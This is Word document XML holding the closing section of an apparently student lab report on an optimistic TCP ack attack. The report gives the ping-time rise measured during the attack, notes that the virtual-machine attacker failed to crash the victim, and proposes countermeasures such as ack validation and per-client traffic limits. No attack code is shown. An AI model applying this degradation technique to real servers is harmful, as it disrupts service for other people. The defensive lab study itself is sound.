        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74A7B082" w14:textId="77777777" w:rsidR="00425884" w:rsidRPr="00425884" w:rsidRDefault="003C203B" w:rsidP="00425884">
      <w:pPr>
        <w:pStyle w:val="NoSpacing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536F2CCD" wp14:editId="6B169DF8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ndowspingaf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84" w:rsidRPr="003C203B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Fig: Ping to “google.com” at </w:t>
      </w:r>
      <w:r w:rsidR="00425884">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>attack</w:t>
      </w:r>
      <w:r w:rsidR="00425884" w:rsidRPr="003C203B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00425884">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602B55D9" w14:textId="77777777" w:rsidR="00B54D77" w:rsidRDefault="00B54D77" w:rsidP="00425884">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="798951F3" w14:textId="77777777" w:rsidR="000B7FBE" w:rsidRDefault="00425884" w:rsidP="00425884">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00425884">
        <w:t>We can see a visible change in ping time</w:t>
      </w:r>
      <w:r>
        <w:t>. Before attack the average ping time was 65ms and 71ms, but at the attack increased the ping time to 166ms and 156ms as a huge portion of the bandwidth was busy giving reply to the unnecessary acks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2419DB9A" w14:textId="77777777" w:rsidR="000B7FBE" w:rsidRDefault="00425884" w:rsidP="000B7FBE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0A7465" w14:textId="77777777" w:rsidR="00425884" w:rsidRPr="00425884" w:rsidRDefault="00425884" w:rsidP="00425884">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attack could not crash the server as our attack was against the main operating system, the victim is quite strong. Our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>virtualbox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> could not reach the threshold of it. But performance degradation was clearly seen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F200B2E" w14:textId="77777777" w:rsidR="000B7FBE" w:rsidRDefault="000B7FBE" w:rsidP="000B7FBE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B5997F0" w14:textId="77777777" w:rsidR="006300F9" w:rsidRDefault="006300F9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27269CD1" w14:textId="77777777" w:rsidR="000B7FBE" w:rsidRDefault="000B7FBE">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F5AD479" w14:textId="77777777" w:rsidR="000B7FBE" w:rsidRDefault="000B7FBE">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A95D191" w14:textId="77777777" w:rsidR="000B7FBE" w:rsidRDefault="000B7FBE">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50957693" w14:textId="77777777" w:rsidR="000B7FBE" w:rsidRDefault="00E417BE" w:rsidP="00E417B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E36C0A" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="E36C0A" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Did I think of any countermeasures for such attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F2C982" w14:textId="77777777" w:rsidR="00E417BE" w:rsidRPr="00E417BE" w:rsidRDefault="00E417BE" w:rsidP="00E417BE"/>
    <w:p w14:paraId="0C28FA43" w14:textId="45F4AE50" w:rsidR="00C4490C" w:rsidRDefault="00C4490C" w:rsidP="00E417BE">
      <w:pPr>
        <w:ind w:left="72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 </w:t>
      </w:r>
      <w:r w:rsidR="00E417BE" w:rsidRPr="008C3347">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">The attack </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E417BE" w:rsidRPr="008C3347">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>can not</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E417BE" w:rsidRPr="008C3347">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> be implemented if the windows firewall is on as firewall detects potentially harmful packets and blocks it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26016DAD" w14:textId="472DC0B5" w:rsidR="00C4490C" w:rsidRDefault="00C4490C" w:rsidP="00E417BE">
      <w:pPr>
        <w:ind w:left="72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 </w:t>
      </w:r>
      <w:r w:rsidR="009A69FC" w:rsidRPr="008C3347">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>But t</w:t>
      </w:r>
      <w:r w:rsidR="00E417BE" w:rsidRPr="008C3347">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">he main countermeasure against optimistic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E417BE" w:rsidRPr="008C3347">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E417BE" w:rsidRPr="008C3347">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> ack attack would </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E417BE" w:rsidRPr="008C3347">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>be  redesigning</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E417BE" w:rsidRPr="008C3347">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidR="00B54D77" w:rsidRPr="008C3347">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E417BE" w:rsidRPr="008C3347">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>TCP.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> If we can make TCP aware of potentially fake acks then it will be able to reject them though the packet was </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>sent .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> the congestion will remain controlled. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D294D7A" w14:textId="5B962055" w:rsidR="000B7FBE" w:rsidRPr="008C3347" w:rsidRDefault="00C4490C" w:rsidP="00E417BE">
      <w:pPr>
        <w:ind w:left="72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E417BE" w:rsidRPr="008C3347">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Another countermeasure would be to implement maximum traffic limits per client from the server side.</w:t>
      </w:r>
      <w:r w:rsidR="002C2C9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> It will stop any fast transmission of packets between attacker and server and thus the main objective of the optimistic TCP ack attack will be hindered.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E417BE" w:rsidRPr="008C3347">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000B7FBE" w:rsidRPr="008C3347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25453" w14:textId="77777777" w:rsidR="00CF47A7" w:rsidRDefault="00CF47A7">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="75A71998" w14:textId="77777777" w:rsidR="00CF47A7" w:rsidRDefault="00CF47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1470B" w14:textId="77777777" w:rsidR="006300F9" w:rsidRDefault="006300F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5D61" w14:textId="77777777" w:rsidR="00CF47A7" w:rsidRDefault="00CF47A7">
      <w:pPr>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="448BF97B" w14:textId="77777777" w:rsidR="00CF47A7" w:rsidRDefault="00CF47A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2EE06" w14:textId="77777777" w:rsidR="006300F9" w:rsidRDefault="00126272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4D77">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:t>8</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="7AC229BA" w14:textId="77777777" w:rsidR="006300F9" w:rsidRDefault="006300F9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1D1E1" w14:textId="77777777" w:rsidR="006300F9" w:rsidRDefault="006300F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945"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3D1C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48DE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4E78E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1E4B44"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8A88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C2C48"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F300D7FA"/>
    <w:lvl w:ilvl="0" w:tplc="CB287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857FD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C12433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C7E70"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="18DE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F9"/>
    <w:rsid w:val="000B7FBE"/>
    <w:rsid w:val="00126272"/>
    <w:rsid w:val="001D0995"/>
    <w:rsid w:val="002C2C9C"/>
    <w:rsid w:val="003A4E8F"/>
    <w:rsid w:val="003C203B"/>
    <w:rsid w:val="003D60C9"/>
    <w:rsid w:val="00410FB9"/>
    <w:rsid w:val="00425884"/>
    <w:rsid w:val="00502001"/>
    <w:rsid w:val="00532E6A"/>
    <w:rsid w:val="006300F9"/>
    <w:rsid w:val="00777F86"/>
    <w:rsid w:val="00785D5C"/>
    <w:rsid w:val="007E28EA"/>
    <w:rsid w:val="00841BCE"/>
    <w:rsid w:val="00863ABC"/>
    <w:rsid w:val="008A417B"/>
    <w:rsid w:val="008B46F6"/>
    <w:rsid w:val="008C3347"/>
    <w:rsid w:val="0095659E"/>
    <w:rsid w:val="009A69FC"/>
    <w:rsid w:val="00A3009D"/>
    <w:rsid w:val="00AB7B3C"/>
    <w:rsid w:val="00AC2B37"/>
    <w:rsid w:val="00B54D77"/>
    <w:rsid w:val="00BA473C"/>
    <w:rsid w:val="00BC0E25"/>
    <w:rsid w:val="00C15CDE"/>
    <w:rsid w:val="00C4490C"/>
    <w:rsid w:val="00CF47A7"/>
    <w:rsid w:val="00DA3ACD"/>
    <w:rsid w:val="00E1714D"/>
    <w:rsid w:val="00E417BE"/>
    <w:rsid w:val="00F52D14"/>
    <w:rsid w:val="00F54725"/>
    <w:rsid w:val="00FD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3F09"/>
  <w15:docId w15:val="{150F6293-F1DB-4594-B035-9E62EBF8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GB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NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="000B7FBE"/>
    <w:pPr>
      <w:spacing w:before="0"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532E6A"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="160" w:line="254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777F8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DefaultParagraphFont"/>
    <w:rsid w:val="00A3009D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="keyword">
    <w:name w:val="keyword"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A3009D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="string">
    <w:name w:val="string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A3009D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="number">
    <w:name w:val="number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A3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</dc:creator>
  <cp:lastModifiedBy>IICT</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <cp:lastPrinted>2019-09-09T04:25:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-09-09T04:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-09-09T04:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>